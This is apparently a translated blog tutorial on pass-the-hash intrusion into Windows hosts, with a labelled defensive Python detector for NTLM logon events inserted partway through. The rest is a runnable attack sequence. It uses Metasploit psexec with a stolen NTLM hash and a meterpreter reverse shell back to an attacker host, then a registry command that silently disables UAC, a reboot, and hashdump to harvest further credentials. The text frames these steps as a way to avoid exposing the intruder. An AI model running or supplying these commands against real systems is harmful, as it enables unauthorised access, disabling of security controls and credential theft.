Preface
Sometimes we obtain a user's password hash but cannot recover the plaintext password from it: cracking a hash means finding an input that produces the same digest, and the chance of success is not especially high. So we take another route and authenticate to the target system directly with the hash value itself (pass-the-hash).
Exploitation process
The premise is that we have already obtained SYSTEM privileges on the target system; we then use the psexec module under Metasploit's SMB exploits:
use exploit/windows/smb/psexec
set rhosts 192.168.75.139
set smbuser pyh    # an ordinary (standard) administrator account
set smbpass aad3b435b51404eeaad3b435b51404ee:588feb889288fb953b5f094d47d1565c
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.128
set lport 3333
show options
run
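From the defender's side, what this step produces on the target is a network logon (type 3) authenticated with NTLM rather than Kerberos. The following Python example is added here and is not code from the original post; it applies a widely used pass-the-hash heuristic to a few constructed Windows Security event 4624 records: logon type 3, authentication package NTLM, logon process NtLmSsp, key length 0. The field names are those of event 4624; the sample records, the user names and the host inventory are constructed for the example. Legitimate NTLM network logons match the same pattern, so the rule is a candidate generator that needs baselining, not a verdict.

```python
"""Heuristic detection of NTLM network logons that fit the pass-the-hash
pattern. Added example over constructed sample data; not from the original post."""
from dataclasses import dataclass

# Records follow the field names of Windows Security event 4624
# ("An account was successfully logged on"). All values are constructed.
SAMPLE_4624 = [
    {"EventID": 4624, "TargetUserName": "pyh", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp",
     "KeyLength": 0, "IpAddress": "192.168.75.128", "WorkstationName": "UNKNOWN-PC"},
    {"EventID": 4624, "TargetUserName": "alice", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "LogonProcessName": "Kerberos",
     "KeyLength": 0, "IpAddress": "10.0.0.5", "WorkstationName": "WS01"},
    {"EventID": 4624, "TargetUserName": "bob", "LogonType": 2,
     "AuthenticationPackageName": "Negotiate", "LogonProcessName": "User32",
     "KeyLength": 0, "IpAddress": "127.0.0.1", "WorkstationName": "WS02"},
    {"EventID": 4624, "TargetUserName": "svc_backup", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "LogonProcessName": "NtLmSsp",
     "KeyLength": 128, "IpAddress": "10.0.0.9", "WorkstationName": "BACKUP01"},
]


@dataclass
class Alert:
    user: str
    source_ip: str
    workstation: str
    reason: str


def is_pth_candidate(ev):
    """True when a 4624 record matches the NTLM-network-logon heuristic."""
    return (ev.get("EventID") == 4624
            and ev.get("LogonType") == 3
            and ev.get("AuthenticationPackageName") == "NTLM"
            and ev.get("LogonProcessName") == "NtLmSsp"
            and ev.get("KeyLength") == 0
            and ev.get("TargetUserName", "").upper() != "ANONYMOUS LOGON")


def detect_pass_the_hash(events, known_hosts=frozenset()):
    """Return one Alert per matching record; known_hosts (upper-case names)
    is the defender's asset inventory, used to raise the alert's weight."""
    alerts = []
    for ev in events:
        if not is_pth_candidate(ev):
            continue
        reason = "NTLM network logon with KeyLength 0"
        if ev.get("WorkstationName", "").upper() not in known_hosts:
            reason += "; source workstation not in inventory"
        alerts.append(Alert(ev["TargetUserName"], ev["IpAddress"],
                            ev["WorkstationName"], reason))
    return alerts


if __name__ == "__main__":
    for alert in detect_pass_the_hash(SAMPLE_4624,
                                      known_hosts={"WS01", "WS02", "BACKUP01"}):
        print(alert)
```

The inventory check is where most of the signal comes from in practice: an NTLM network logon by an administrator account from a workstation that does not exist in the asset database is far more interesting than the same logon from a known backup server.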
After running the module, we found that the attempt was blocked by UAC.
There are two ways to turn UAC off. The first is to do it directly in the Windows Control Panel: open the user accounts settings, go to User Account Control settings, and move the slider to the lowest level.
But since you are infiltrating someone else's system, you can hardly ask them to turn it off for you first, as that would expose your presence. So I recommend the second method: change the UAC value in the registry through the shell we have already obtained.
After entering the shell, execute:
reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
The registry path must be written exactly; that is where the UAC setting lives. Once the modification succeeds, run
shutdown -g
to restart the computer. Before rebooting, I recommend running the hashdump module so the recovered hashes can be tried against common passwords:
use post/windows/gather/hashdump
set session 4
run